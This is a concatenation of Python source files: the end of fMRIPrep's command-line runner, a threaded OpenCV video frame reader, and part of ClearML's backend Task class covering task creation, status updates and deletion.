'--reports-only', action='store_true', default=False,
help='only generate reports, don\'t run workflows. This will only rerun report '
'aggregation, not reportlet generation for specific nodes.')
g_other.add_argument(
'--run-uuid', action='store', default=None,
help='Specify UUID of previous run, to include error logs in report. '
'No effect without --reports-only.')
g_other.add_argument('--write-graph', action='store_true', default=False,
help='Write workflow graph.')
g_other.add_argument('--stop-on-first-crash', action='store_true', default=False,
help='Force stopping on first crash, even if a work directory'
' was specified.')
g_other.add_argument('--notrack', action='store_true', default=False,
help='Opt-out of sending tracking information of this run to '
'the FMRIPREP developers. This information helps to '
'improve FMRIPREP and provides an indicator of real '
'world usage crucial for obtaining funding.')
return parser
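# Illustrative invocation of the parser built above (assuming the standard
# `fmriprep` console entry point; paths and labels are hypothetical):
#   fmriprep /data/bids /data/out participant \
#       --participant_label 01 --fs-license-file /opt/freesurfer/license.txt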
def main():
"""Entry point"""
from nipype import logging as nlogging
from multiprocessing import set_start_method, Process, Manager
from ..viz.reports import generate_reports
from ..info import __version__
set_start_method('forkserver')
warnings.showwarning = _warn_redirect
opts = get_parser().parse_args()
# FreeSurfer license
default_license = op.join(os.getenv('FREESURFER_HOME', ''), 'license.txt')
# Precedence: --fs-license-file, $FS_LICENSE, default_license
license_file = opts.fs_license_file or os.getenv('FS_LICENSE', default_license)
if not os.path.exists(license_file):
raise RuntimeError(
'ERROR: a valid license file is required for FreeSurfer to run. '
'FMRIPREP looked for an existing license file at several paths, in this '
'order: 1) command line argument ``--fs-license-file``; 2) ``$FS_LICENSE`` '
'environment variable; and 3) the ``$FREESURFER_HOME/license.txt`` path. '
'Get it (for free) by registering at https://'
'surfer.nmr.mgh.harvard.edu/registration.html')
os.environ['FS_LICENSE'] = license_file
# Retrieve logging level
log_level = int(max(25 - 5 * opts.verbose_count, logging.DEBUG))
# Set logging
logger.setLevel(log_level)
nlogging.getLogger('nipype.workflow').setLevel(log_level)
nlogging.getLogger('nipype.interface').setLevel(log_level)
nlogging.getLogger('nipype.utils').setLevel(log_level)
errno = 0
# Call build_workflow(opts, retval)
with Manager() as mgr:
retval = mgr.dict()
p = Process(target=build_workflow, args=(opts, retval))
p.start()
p.join()
if p.exitcode != 0:
sys.exit(p.exitcode)
fmriprep_wf = retval['workflow']
plugin_settings = retval['plugin_settings']
output_dir = retval['output_dir']
work_dir = retval['work_dir']
subject_list = retval['subject_list']
run_uuid = retval['run_uuid']
retcode = retval['return_code']
if fmriprep_wf is None:
sys.exit(1)
if opts.write_graph:
fmriprep_wf.write_graph(graph2use="colored", format='svg', simple_form=True)
if opts.reports_only:
sys.exit(int(retcode > 0))
# Sentry tracking
if not opts.notrack:
try:
from raven import Client
dev_user = bool(int(os.getenv('FMRIPREP_DEV', 0)))
msg = 'fMRIPrep running%s' % (int(dev_user) * ' [dev]')
client = Client(
'https://d5a16b0c38d84d1584dfc93b9fb1ade6:'
'21f3c516491847af8e4ed249b122c4af@sentry.io/1137693',
release=__version__)
client.captureMessage(message=msg,
level='debug' if dev_user else 'info',
tags={
'run_id': run_uuid,
'npart': len(subject_list),
'type': 'ping',
'dev': dev_user})
except Exception:
pass
# Clean up master process before running workflow, which may create forks
gc.collect()
try:
fmriprep_wf.run(**plugin_settings)
except RuntimeError as e:
if "Workflow did not execute cleanly" in str(e):
errno = 1
else:
raise
# Generate reports phase
errno += generate_reports(subject_list, output_dir, work_dir, run_uuid)
sys.exit(int(errno > 0))
def build_workflow(opts, retval):
"""
Create the Nipype Workflow that supports the whole execution
graph, given the inputs.
All the checks and the construction of the workflow are done
inside this function that has pickleable inputs and output
dictionary (``retval``) to allow isolation using a
``multiprocessing.Process`` that allows fmriprep to enforce
a hard-limited memory-scope.
"""
from nipype import logging, config as ncfg
from ..info import __version__
from ..workflows.base import init_fmriprep_wf
from ..utils.bids import collect_participants
from ..viz.reports import generate_reports
logger = logging.getLogger('nipype.workflow')
INIT_MSG = """
Running fMRIPREP version {version}:
* BIDS dataset path: {bids_dir}.
* Participant list: {subject_list}.
* Run identifier: {uuid}.
""".format
output_spaces = opts.output_space or []
# Validity of some inputs
# ERROR check if use_aroma was specified, but the correct template was not
if opts.use_aroma and (opts.template != 'MNI152NLin2009cAsym' or
'template' not in output_spaces):
output_spaces.append('template')
logger.warning(
'Option "--use-aroma" requires functional images to be resampled to MNI space. '
'The argument "template" has been automatically added to the list of output '
'spaces (option "--output-space").'
)
# Check output_space
if 'template' not in output_spaces and (opts.use_syn_sdc or opts.force_syn):
msg = ['SyN SDC correction requires T1 to MNI registration, but '
'"template" is not specified in "--output-space" arguments.',
'Option --use-syn will be cowardly dismissed.']
if opts.force_syn:
output_spaces.append('template')
msg[1] = (' Since --force-syn has been requested, "template" has been added to'
' the "--output-space" list.')
logger.warning(' '.join(msg))
# Set up some instrumental utilities
run_uuid = '%s_%s' % (strftime('%Y%m%d-%H%M%S'), uuid.uuid4())
# First check that bids_dir looks like a BIDS folder
bids_dir = op.abspath(opts.bids_dir)
subject_list = collect_participants(
bids_dir, participant_label=opts.participant_label)
# Setting up MultiProc
nthreads = opts.nthreads
if nthreads < 1:
nthreads = cpu_count()
plugin_settings = {
'plugin': 'MultiProc',
'plugin_args': {
'n_procs': nthreads,
'raise_insufficient': False,
'maxtasksperchild': 1,
}
}
if opts.mem_mb:
plugin_settings['plugin_args']['memory_gb'] = opts.mem_mb / 1024
# Overload plugin_settings if --use-plugin
if opts.use_plugin is not None:
from yaml import load as loadyml
with open(opts.use_plugin) as f:
plugin_settings = loadyml(f)
omp_nthreads = opts.omp_nthreads
if omp_nthreads == 0:
omp_nthreads = min(nthreads - 1 if nthreads > 1 else cpu_count(), 8)
if 1 < nthreads < omp_nthreads:
logger.warning(
'Per-process threads (--omp-nthreads=%d) exceed total '
'threads (--nthreads/--n_cpus=%d)', omp_nthreads, nthreads)
# Set up directories
output_dir = op.abspath(opts.output_dir)
log_dir = op.join(output_dir, 'fmriprep', 'logs')
work_dir = op.abspath(opts.work_dir or 'work') # Set work/ as default
# Check and create output and working directories
os.makedirs(output_dir, exist_ok=True)
os.makedirs(log_dir, exist_ok=True)
os.makedirs(work_dir, exist_ok=True)
# Nipype config (logs and execution)
ncfg.update_config({
'logging': {
'log_directory': log_dir,
'log_to_file': True
},
'execution': {
'crashdump_dir': log_dir,
'crashfile_format': 'txt',
'get_linked_libs': False,
'stop_on_first_crash': opts.stop_on_first_crash or opts.work_dir is None,
},
'monitoring': {
'enabled': opts.resource_monitor,
'sample_frequency': '0.5',
'summary_append': True,
}
})
if opts.resource_monitor:
ncfg.enable_resource_monitor()
retval['return_code'] = 0
retval['plugin_settings'] = plugin_settings
retval['output_dir'] = output_dir
retval['work_dir'] = work_dir
retval['subject_list'] = subject_list
retval['run_uuid'] = run_uuid
retval['workflow'] = None
# Called with reports only
if opts.reports_only:
logger.log(25, 'Running --reports-only on participants %s', ', '.join(subject_list))
if opts.run_uuid is not None:
run_uuid = opts.run_uuid
retval['return_code'] = generate_reports(subject_list, output_dir, work_dir, run_uuid)
return retval
# Build main workflow
logger.log(25, INIT_MSG(
version=__version__,
bids_dir=bids_dir,
subject_list=subject_list,
uuid=run_uuid)
)
template_out_grid = opts.template_resampling_grid
if opts.output_grid_reference is not None:
logger.warning(
'Option --output-grid-reference is deprecated, please use '
'--template-resampling-grid')
template_out_grid = template_out_grid or opts.output_grid_reference
retval['workflow'] = init_fmriprep_wf(
subject_list=subject_list,
task_id=opts.task_id,
run_uuid=run_uuid,
ignore=opts.ignore,
debug=opts.debug,
low_mem=opts.low_mem,
anat_only=opts.anat_only,
longitudinal=opts.longitudinal,
t2s_coreg=opts.t2s_coreg,
omp_nthreads=omp_nthreads,
skull_strip_template=opts.skull_strip_template,
work_dir=work_dir,
output_dir=output_dir,
bids_dir=bids_dir,
freesurfer=opts.run_reconall,
output_spaces=output_spaces,
template=opts.template,
medial_surface_nan=opts.medial_surface_nan,
cifti_output=opts.cifti_output,
template_out_grid=template_out_grid,
hires=opts.hires,
use_bbr=opts.use_bbr,
bold2t1w_dof=opts.bold2t1w_dof,
fmap_bspline=opts.fmap_bspline,
fmap_demean=opts.fmap_no_demean,
use_syn=opts.use_syn_sdc,
force_syn=opts.force_syn,
use_aroma=opts.use_aroma,
aroma_melodic_dim=opts.aroma_melodic_dimensionality,
ignore_aroma_err=opts.ignore_aroma_denoising_errors,
)
retval['return_code'] = 0
return retval
if __name__ == '__main__':
raise RuntimeError("fmriprep/cli/run.py should not be run directly;\n"
"Please `pip install` fmriprep and use the `fmriprep` command")
|
video_read.py
|
from threading import Thread
from os.path import expanduser
import numpy as np
import cv2
from pathlib import Path
from PIL import Image
from .config import config
class VideoReader:
footage_path = config.CONFIG['footage_path']
footage_files = config.CONFIG['footage_files']
width = config.CONFIG['width']
height = config.CONFIG['height']
device_video = bool(config.CONFIG['device_video'])
currentvideo = None
default_image_np_global = np.zeros([height, width, 3], dtype=np.uint8)  # image arrays are (height, width, channels)
capture_frame_rgb_np = None
capture_frame_rgb = None
logger = config.logger
frame_number = 0
def __init__(self):
self.logger.debug('VideoRead')
self.logger.debug('Config at: ' + str(config.CONFIG_FILE))
self.logger.debug(config.CONFIG)
video_read_thread = Thread(target=self.video_read)
video_read_thread.start()
self.logger.debug('video_read_thread started')
def video_read(self):
for footage_file in self.footage_files:
self.logger.debug('Processing: ' + footage_file)
self.currentvideo = footage_file
self.frame_number = 0
if self.device_video:
    video = 0
else:
    video = Path(self.footage_path + '/' + footage_file)
    # expand a leading '~' in the footage path; cv2.VideoCapture expects a string path
    try:
        video = expanduser(str(video))
    except BaseException:
        pass
cap = cv2.VideoCapture(video)
while(cap.isOpened() and not config.GLOBAL_EXIT_SIGNAL):
ret, frame = cap.read()
try:
if frame is not None:
self.frame_number += 1
frame = cv2.resize(frame, (self.width, self.height))
ar = frame
ar = ar[:, :, 0:3]
(im_height, im_width, _) = frame.shape
self.default_image_np_global = np.array(ar).reshape((im_height, im_width, 3)).astype(np.uint8)
self.capture_frame_rgb_np = cv2.cvtColor(self.default_image_np_global, cv2.COLOR_BGR2RGB)
self.capture_frame_rgb = Image.fromarray(self.capture_frame_rgb_np)
else:
break
except RuntimeError as re:
self.logger.debug("default_capture_thread:" + str(re))
# cv2.imshow('video_read', self.default_image_np_global)
# if cv2.waitKey(1) & 0xFF == ord('q'):
# break
cap.release()
cv2.destroyAllWindows()
config.GLOBAL_EXIT_SIGNAL = True
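# Illustrative sketch (not part of the original module): one way a consumer might poll frames
# produced by VideoReader. The attribute names match the class above; the polling interval and
# the print statement are assumptions for demonstration only.
#
#   import time
#   reader = VideoReader()              # starts the background video_read thread
#   while not config.GLOBAL_EXIT_SIGNAL:
#       rgb = reader.capture_frame_rgb  # PIL.Image, or None until the first frame arrives
#       if rgb is not None:
#           print(reader.currentvideo, reader.frame_number, rgb.size)
#       time.sleep(0.1)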
|
task.py
|
""" Backend task management support """
import itertools
import json
import logging
import os
import re
import sys
from copy import copy
from enum import Enum
from multiprocessing import RLock
from operator import itemgetter
from tempfile import gettempdir
from threading import Thread
from typing import Optional, Any, Sequence, Callable, Mapping, Union, List, Set
from uuid import uuid4
from pathlib2 import Path
try:
# noinspection PyCompatibility
from collections.abc import Iterable
except ImportError:
from collections import Iterable
import six
from collections import OrderedDict
from six.moves.urllib.parse import quote
from ...utilities.locks import RLock as FileRLock
from ...utilities.proxy_object import verify_basic_type
from ...binding.artifacts import Artifacts
from ...backend_interface.task.development.worker import DevWorker
from ...backend_interface.session import SendError
from ...backend_api import Session
from ...backend_api.services import tasks, models, events, projects
from ...backend_api.session.defs import ENV_OFFLINE_MODE
from ...utilities.pyhocon import ConfigTree, ConfigFactory
from ...utilities.config import config_dict_to_text, text_to_config_dict
from ..base import IdObjectBase, InterfaceBase
from ..metrics import Metrics, Reporter
from ..model import Model
from ..setupuploadmixin import SetupUploadMixin
from ..util import (
make_message, get_or_create_project, get_single_result,
exact_match_regex, mutually_exclusive, )
from ...config import (
get_config_for_bucket, get_remote_task_id, TASK_ID_ENV_VAR,
running_remotely, get_cache_dir, DOCKER_IMAGE_ENV_VAR, get_offline_dir, get_log_to_backend, )
from ...debugging import get_logger
from ...storage.helper import StorageHelper, StorageError
from .access import AccessMixin
from .repo import ScriptInfo, pip_freeze
from .hyperparams import HyperParams
from ...config import config, PROC_MASTER_ID_ENV_VAR, SUPPRESS_UPDATE_MESSAGE_ENV_VAR
class Task(IdObjectBase, AccessMixin, SetupUploadMixin):
""" Task manager providing task object access and management. Includes read/write access to task-associated
frames and models.
"""
_anonymous_dataview_id = '__anonymous__'
_development_tag = 'development'
archived_tag = 'archived'
_default_configuration_section_name = 'General'
_legacy_parameters_section_name = 'Args'
_force_requirements = {}
_store_diff = config.get('development.store_uncommitted_code_diff', False)
_store_remote_diff = config.get('development.store_code_diff_from_remote', False)
_offline_filename = 'task.json'
class TaskTypes(Enum):
def __str__(self):
return str(self.value)
def __eq__(self, other):
return str(self) == str(other)
training = 'training'
testing = 'testing'
inference = "inference"
data_processing = "data_processing"
application = "application"
monitor = "monitor"
controller = "controller"
optimizer = "optimizer"
service = "service"
qc = "qc"
custom = "custom"
class TaskStatusEnum(Enum):
def __str__(self):
return str(self.value)
def __eq__(self, other):
return str(self) == str(other)
created = "created"
queued = "queued"
in_progress = "in_progress"
stopped = "stopped"
published = "published"
publishing = "publishing"
closed = "closed"
failed = "failed"
completed = "completed"
unknown = "unknown"
class DeleteError(Exception):
pass
def __init__(self, session=None, task_id=None, log=None, project_name=None,
task_name=None, task_type=TaskTypes.training, log_to_backend=True,
raise_on_validation_errors=True, force_create=False):
"""
Create a new task instance.
:param session: Optional API Session instance. If not provided, a default session based on the system's
configuration will be used.
:type session: Session
:param task_id: Optional task ID. If not provided, a new task will be created using the API
and its information reflected in the resulting instance.
:type task_id: string
:param log: Optional log to be used. If not provided, an internal log shared with all backend objects will be
used instead.
:type log: logging.Logger
:param project_name: Optional project name, used only if a new task is created. The new task will be associated
with a project by this name. If no such project exists, a new project will be created using the API.
:type project_name: str
:param task_name: Optional task name, used only if a new task is created.
:type task_name: str
:param task_type: Optional task type, used only if a new task is created. Default is training task.
:type task_type: str (see tasks.TaskTypeEnum)
:param log_to_backend: If True, all calls to the task's log will be logged to the backend using the API.
This value can be overridden using the environment variable TRAINS_LOG_TASK_TO_BACKEND.
:type log_to_backend: bool
:param force_create: If True a new task will always be created (task_id, if provided, will be ignored)
:type force_create: bool
"""
task_id = self._resolve_task_id(task_id, log=log) if not force_create else None
self.__edit_lock = None
super(Task, self).__init__(id=task_id, session=session, log=log)
self._project_name = None
self._storage_uri = None
self._input_model = None
self._output_model = None
self._metrics_manager = None
self.__reporter = None
self._curr_label_stats = {}
self._raise_on_validation_errors = raise_on_validation_errors
self._parameters_allowed_types = tuple(set(
six.string_types + six.integer_types + (six.text_type, float, list, tuple, dict, type(None))
))
self._app_server = None
self._files_server = None
self._initial_iteration_offset = 0
self._reload_skip_flag = False
if not task_id:
# generate a new task
self.id = self._auto_generate(project_name=project_name, task_name=task_name, task_type=task_type)
if self._offline_mode:
self.data.id = self.id
self.name = task_name
else:
# this is an existing task, let's try to verify stuff
self._validate()
if self.data is None:
raise ValueError("Task ID \"{}\" could not be found".format(self.id))
self._project_name = (self.project, project_name)
if running_remotely() or DevWorker.report_stdout:
log_to_backend = False
self._log_to_backend = get_log_to_backend(default=log_to_backend)
self._artifacts_manager = Artifacts(self)
self._hyper_params_manager = HyperParams(self)
def _validate(self, check_output_dest_credentials=True):
raise_errors = self._raise_on_validation_errors
output_dest = self.get_output_destination(raise_on_error=False, log_on_error=False)
if output_dest and check_output_dest_credentials:
try:
self.log.info('Validating output destination')
conf = get_config_for_bucket(base_url=output_dest)
if not conf:
msg = 'Failed resolving output destination (no credentials found for %s)' % output_dest
self.log.warning(msg)
if raise_errors:
raise Exception(msg)
except StorageError:
raise
except Exception as ex:
self.log.error('Failed trying to verify output destination: %s' % ex)
@classmethod
def _resolve_task_id(cls, task_id, log=None):
if not task_id:
task_id = cls.normalize_id(get_remote_task_id())
if task_id:
log = log or get_logger('task')
log.info('Using task ID from env %s=%s' % (TASK_ID_ENV_VAR[0], task_id))
return task_id
def _update_repository(self):
def check_package_update():
# noinspection PyBroadException
try:
# check latest version
from ...utilities.check_updates import CheckPackageUpdates
latest_version = CheckPackageUpdates.check_new_package_available(only_once=True)
if latest_version and not SUPPRESS_UPDATE_MESSAGE_ENV_VAR.get(
default=config.get('development.suppress_update_message', False)):
if not latest_version[1]:
sep = os.linesep
self.get_logger().report_text(
'{} new package available: UPGRADE to v{} is recommended!\nRelease Notes:\n{}'.format(
Session.get_clients()[0][0].upper(), latest_version[0], sep.join(latest_version[2])),
)
else:
self.get_logger().report_text(
'ClearML new version available: upgrade to v{} is recommended!'.format(
latest_version[0]),
)
except Exception:
pass
# get repository and create requirements.txt from code base
try:
check_package_update_thread = Thread(target=check_package_update)
check_package_update_thread.daemon = True
check_package_update_thread.start()
# do not request requirements, because it might be a long process, and we first want to update the git repo
result, script_requirements = ScriptInfo.get(
filepaths=[self._calling_filename, sys.argv[0], ]
if ScriptInfo.is_running_from_module() else [sys.argv[0], self._calling_filename, ],
log=self.log, create_requirements=False,
check_uncommitted=self._store_diff, uncommitted_from_remote=self._store_remote_diff
)
for msg in result.warning_messages:
self.get_logger().report_text(msg)
# if the git diff is too large to store on the task, we must store it as an artifact:
if result.auxiliary_git_diff:
diff_preview = "# git diff too large to handle, storing as artifact. git diff summary:\n"
diff_preview += '\n'.join(
line for line in result.auxiliary_git_diff.split('\n') if line.startswith('diff --git '))
self._artifacts_manager.upload_artifact(
name='auxiliary_git_diff', artifact_object=result.auxiliary_git_diff,
preview=diff_preview,
)
# store original entry point
entry_point = result.script.get('entry_point') if result.script else None
# check if we are running inside a module, then we should set our entry point
# to the module call including all argv's
result.script = ScriptInfo.detect_running_module(result.script)
# Since we might run asynchronously, don't use self.data (let someone else
# overwrite it before we have a chance to call edit)
with self._edit_lock:
self.reload()
self.data.script = result.script
self._edit(script=result.script)
# if jupyter is present, requirements will be created in the background, when saving a snapshot
if result.script and script_requirements:
entry_point_filename = None if config.get('development.force_analyze_entire_repo', False) else \
os.path.join(result.script['working_dir'], entry_point)
if config.get('development.detect_with_pip_freeze', False) or \
config.get('development.detect_with_conda_freeze', False):
requirements, conda_requirements = pip_freeze(
config.get('development.detect_with_conda_freeze', False))
requirements = '# Python ' + sys.version.replace('\n', ' ').replace('\r', ' ') + '\n\n'\
+ requirements
else:
requirements, conda_requirements = script_requirements.get_requirements(
entry_point_filename=entry_point_filename)
if requirements:
if not result.script['requirements']:
result.script['requirements'] = {}
result.script['requirements']['pip'] = requirements
result.script['requirements']['conda'] = conda_requirements
self._update_requirements(result.script.get('requirements') or '')
# we do not want to wait for the check version thread,
# because someone might wait for us to finish the repo detection update
except SystemExit:
pass
except Exception as e:
get_logger('task').debug(str(e))
def _auto_generate(self, project_name=None, task_name=None, task_type=TaskTypes.training):
created_msg = make_message('Auto-generated at %(time)s UTC by %(user)s@%(host)s')
if task_type.value not in (self.TaskTypes.training, self.TaskTypes.testing) and \
not Session.check_min_api_version('2.8'):
print('WARNING: Changing task type to "{}" : '
'clearml-server does not support task type "{}", '
'please upgrade clearml-server.'.format(self.TaskTypes.training, task_type.value))
task_type = self.TaskTypes.training
project_id = None
if project_name:
project_id = get_or_create_project(self, project_name, created_msg)
tags = [self._development_tag] if not running_remotely() else []
extra_properties = {'system_tags': tags} if Session.check_min_api_version('2.3') else {'tags': tags}
req = tasks.CreateRequest(
name=task_name or make_message('Anonymous task (%(user)s@%(host)s %(time)s)'),
type=tasks.TaskTypeEnum(task_type.value),
comment=created_msg,
project=project_id,
input={'view': {}},
**extra_properties
)
res = self.send(req)
return res.response.id if res else 'offline-{}'.format(str(uuid4()).replace("-", ""))
def _set_storage_uri(self, value):
value = value.rstrip('/') if value else None
self._storage_uri = StorageHelper.conform_url(value)
self.data.output.destination = self._storage_uri
self._edit(output_dest=self._storage_uri or ('' if Session.check_min_api_version('2.3') else None))
if self._storage_uri or self._output_model:
self.output_model.upload_storage_uri = self._storage_uri
@property
def storage_uri(self):
# type: () -> Optional[str]
if self._storage_uri:
return self._storage_uri
if running_remotely():
return self.data.output.destination
else:
return None
@storage_uri.setter
def storage_uri(self, value):
# type: (str) -> ()
self._set_storage_uri(value)
@property
def task_id(self):
# type: () -> str
return self.id
@property
def name(self):
# type: () -> str
return self.data.name or ''
@name.setter
def name(self, value):
# type: (str) -> ()
self.set_name(value)
@property
def task_type(self):
# type: () -> str
return self.data.type
@property
def project(self):
# type: () -> str
return self.data.project
@property
def parent(self):
# type: () -> str
return self.data.parent
@property
def input_model_id(self):
# type: () -> str
return self.data.execution.model
@property
def output_model_id(self):
# type: () -> str
return self.data.output.model
@property
def comment(self):
# type: () -> str
return self.data.comment or ''
@comment.setter
def comment(self, value):
# type: (str) -> ()
self.set_comment(value)
@property
def cache_dir(self):
# type: () -> Path
""" The cache directory which is used to store the Task related files. """
return Path(get_cache_dir()) / self.id
@property
def status(self):
# type: () -> str
"""
The Task's status. To keep the Task updated, ClearML reloads the Task status
information only when this value is accessed.
:return: str: TaskStatusEnum status
"""
return self.get_status()
@property
def _status(self):
# type: () -> str
""" Return the task's cached status (don't reload if we don't have to) """
return str(self.data.status)
@property
def input_model(self):
# type: () -> Optional[Model]
""" A model manager used to handle the input model object """
model_id = self._get_task_property('execution.model', raise_on_error=False)
if not model_id:
return None
if self._input_model is None:
self._input_model = Model(
session=self.session,
model_id=model_id,
cache_dir=self.cache_dir,
log=self.log,
upload_storage_uri=None)
return self._input_model
@property
def output_model(self):
# type: () -> Optional[Model]
""" A model manager used to manage the output model object """
if self._output_model is None:
self._output_model = self._get_output_model(upload_required=True)
return self._output_model
def create_output_model(self):
# type: () -> Model
return self._get_output_model(upload_required=False, force=True)
def reload(self):
# type: () -> ()
"""
Reload current Task's state from clearml-server.
Refresh all task's fields, including artifacts / models / parameters etc.
"""
return super(Task, self).reload()
def _get_output_model(self, upload_required=True, force=False, model_id=None):
# type: (bool, bool, Optional[str]) -> Model
return Model(
session=self.session,
model_id=model_id or (None if force else self._get_task_property(
'output.model', raise_on_error=False, log_on_error=False)),
cache_dir=self.cache_dir,
upload_storage_uri=self.storage_uri or self.get_output_destination(
raise_on_error=upload_required, log_on_error=upload_required),
upload_storage_suffix=self._get_output_destination_suffix('models'),
log=self.log)
@property
def metrics_manager(self):
# type: () -> Metrics
""" A metrics manager used to manage the metrics related to this task """
return self._get_metrics_manager(self.get_output_destination())
@property
def _reporter(self):
# type: () -> Reporter
"""
Returns a simple metrics reporter instance.
"""
if self.__reporter is None:
self._setup_reporter()
return self.__reporter
def _get_metrics_manager(self, storage_uri):
# type: (str) -> Metrics
if self._metrics_manager is None:
self._metrics_manager = Metrics(
session=self.session,
task=self,
storage_uri=storage_uri,
storage_uri_suffix=self._get_output_destination_suffix('metrics'),
iteration_offset=self.get_initial_iteration()
)
return self._metrics_manager
def _setup_reporter(self):
# type: () -> Reporter
try:
storage_uri = self.get_output_destination(log_on_error=False)
except ValueError:
storage_uri = None
self.__reporter = Reporter(self._get_metrics_manager(storage_uri=storage_uri))
return self.__reporter
def _get_output_destination_suffix(self, extra_path=None):
# type: (Optional[str]) -> str
return '/'.join(quote(x, safe="'[]{}()$^,.; -_+-=") for x in
(self.get_project_name(), '%s.%s' % (self.name, self.data.id), extra_path) if x)
def _reload(self):
# type: () -> Any
""" Reload the task object from the backend """
with self._edit_lock:
if self._offline_mode:
# noinspection PyBroadException
try:
with open((self.get_offline_mode_folder() / self._offline_filename).as_posix(), 'rt') as f:
stored_dict = json.load(f)
stored_data = tasks.Task(**stored_dict)
# add missing entries
for k, v in stored_dict.items():
if not hasattr(stored_data, k):
setattr(stored_data, k, v)
if stored_dict.get('project_name'):
self._project_name = (None, stored_dict.get('project_name'))
except Exception:
stored_data = self._data
return stored_data or tasks.Task(
execution=tasks.Execution(
parameters={}, artifacts=[], dataviews=[], model='',
model_desc={}, model_labels={}, docker_cmd=''),
output=tasks.Output())
if self._reload_skip_flag and self._data:
return self._data
res = self.send(tasks.GetByIdRequest(task=self.id))
return res.response.task
def reset(self, set_started_on_success=True):
# type: (bool) -> ()
""" Reset the task. Task will be reloaded following a successful reset. """
self.send(tasks.ResetRequest(task=self.id))
if set_started_on_success:
self.started()
elif self._data:
# if not started, make sure the current cached state is synced
self._data.status = self.TaskStatusEnum.created
self.reload()
def started(self, ignore_errors=True, force=False):
# type: (bool, bool) -> ()
""" The signal that this Task started. """
return self.send(tasks.StartedRequest(self.id, force=force), ignore_errors=ignore_errors)
def stopped(self, ignore_errors=True, force=False):
# type: (bool, bool) -> ()
""" The signal that this Task stopped. """
return self.send(tasks.StoppedRequest(self.id, force=force), ignore_errors=ignore_errors)
def completed(self, ignore_errors=True):
# type: (bool) -> ()
""" The signal indicating that this Task completed. """
if hasattr(tasks, 'CompletedRequest') and callable(tasks.CompletedRequest):
return self.send(tasks.CompletedRequest(self.id, status_reason='completed'), ignore_errors=ignore_errors)
return self.send(tasks.StoppedRequest(self.id, status_reason='completed'), ignore_errors=ignore_errors)
def mark_failed(self, ignore_errors=True, status_reason=None, status_message=None):
# type: (bool, Optional[str], Optional[str]) -> ()
""" The signal that this Task stopped. """
return self.send(tasks.FailedRequest(self.id, status_reason=status_reason, status_message=status_message),
ignore_errors=ignore_errors)
def publish(self, ignore_errors=True):
# type: (bool) -> ()
""" The signal that this Task will be published """
if str(self.status) != str(tasks.TaskStatusEnum.stopped):
raise ValueError("Can't publish, Task is not stopped")
resp = self.send(tasks.PublishRequest(self.id), ignore_errors=ignore_errors)
assert isinstance(resp.response, tasks.PublishResponse)
return resp
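# Illustrative sketch (not part of the original class): publish() requires the task to be in a
# stopped state, so a typical (assumed) call sequence on a finished task might look like:
#
#   task.stopped()                           # mark the task as stopped on the server
#   task.publish(ignore_errors=False)        # raises ValueError if the task is not stopped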
def _delete(
self,
delete_artifacts_and_models=True,
skip_models_used_by_other_tasks=True,
raise_on_error=False,
):
# type: (bool, bool, bool) -> bool
"""
Delete the task as well as its output models and artifacts.
Models and artifacts are deleted from their storage locations, each using its URI.
Note: in order to delete models and artifacts using their URI, make sure the proper storage credentials are
configured in your configuration file (e.g. if an artifact is stored in S3, make sure sdk.aws.s3.credentials
are properly configured and that you have delete permission in the related buckets).
:param delete_artifacts_and_models: If True, artifacts and models would also be deleted (default True)
:param skip_models_used_by_other_tasks: If True, models used by other tasks would not be deleted (default True)
:param raise_on_error: If True an exception will be raised when encountering an error.
If False an error would be printed and no exception will be raised.
:return: True if the task was deleted successfully.
"""
try:
res = self.send(tasks.GetByIdRequest(self.task_id))
task = res.response.task
if task.status == Task.TaskStatusEnum.published:
if raise_on_error:
raise self.DeleteError("Cannot delete published task {}".format(self.task_id))
self.log.error("Cannot delete published task {}".format(self.task_id))
return False
execution = {}
models_res = []
if delete_artifacts_and_models:
execution = task.execution.to_dict() if task.execution else {}
models_res = self.send(
models.GetAllRequest(
task=[task.id], only_fields=["id", "uri"]
)
).response.models
event_uris = list(self._get_all_events(
event_type="training_debug_image", unique_selector=itemgetter("url"), batch_size=10000
))
event_uris.extend(self._get_image_plot_uris())
task_deleted = self.send(tasks.DeleteRequest(self.task_id, force=True))
if not task_deleted:
if raise_on_error:
raise self.DeleteError("Failed deleting task {}".format(self.task_id))
self.log.error("Failed deleting task {}".format(self.task_id))
return False
except self.DeleteError:
raise
except Exception as ex:
if raise_on_error:
raise self.DeleteError("Task deletion failed: {}".format(ex))
self.log.error("Task deletion failed: {}".format(ex))
return False
failures = []
if delete_artifacts_and_models:
for e in execution["artifacts"]:
if e["mode"] == "output" and not self._delete_uri(e["uri"]):
failures.append(e["uri"])
for m in models_res:
# noinspection PyBroadException
try:
is_output_model = task.output and (m.id == task.output.model)
res = self.send(
models.DeleteRequest(m.id, force=(not skip_models_used_by_other_tasks)),
ignore_errors=is_output_model
)
# Should delete if the model was deleted, or if this was the output model (which was already
# deleted by DeleteRequest and whose URI is left dangling)
should_delete = is_output_model or res.response.deleted
except SendError as ex:
if (ex.result.meta.result_code, ex.result.meta.result_subcode) == (400, 201):
# Model not found, already deleted by DeleteRequest
should_delete = True
else:
failures.append("model id: {}".format(m.id))
continue
except Exception as ex:
failures.append("model id: {}".format(m.id))
continue
if should_delete and not self._delete_uri(m.uri):
failures.append(m.uri)
for uri in event_uris:
if not self._delete_uri(uri):
failures.append(uri)
if len(failures):
error = "Failed deleting the following URIs:\n{}".format(
"\n".join(failures)
)
if raise_on_error:
raise self.DeleteError(error)
self.log.error(error)
return task_deleted
def _delete_uri(self, uri):
# type: (str) -> bool
# noinspection PyBroadException
try:
deleted = StorageHelper.get(uri).delete(uri)
if deleted:
self.log.debug("Deleted file: {}".format(uri))
return True
except Exception as ex:
self.log.error("Failed deleting {}: {}".format(uri, str(ex)))
return False
return False
def _get_image_plot_uris(self):
# type: () -> Set[str]
def image_source_selector(d):
plot = d.get("plot_str")
if plot:
# noinspection PyBroadException
try:
plot = json.loads(plot)
return next(
filter(None, (image.get("source") for image in plot.get("layout", {}).get("images", []))),
None
)
except Exception:
pass
return self._get_all_events(
event_type="plot",
unique_selector=image_source_selector,
batch_size=10000
)
def update_model_desc(self, new_model_desc_file=None):
# type: (Optional[str]) -> ()
""" Change the Task's model description. """
with self._edit_lock:
self.reload()
execution = self._get_task_property('execution')
p = Path(new_model_desc_file)
if not p.is_file():
raise IOError('model_desc file %s cannot be found' % new_model_desc_file)
new_model_desc = p.read_text()
model_desc_key = list(execution.model_desc.keys())[0] if execution.model_desc else 'design'
execution.model_desc[model_desc_key] = new_model_desc
res = self._edit(execution=execution)
return res.response
def update_output_model(self, model_uri, name=None, comment=None, tags=None):
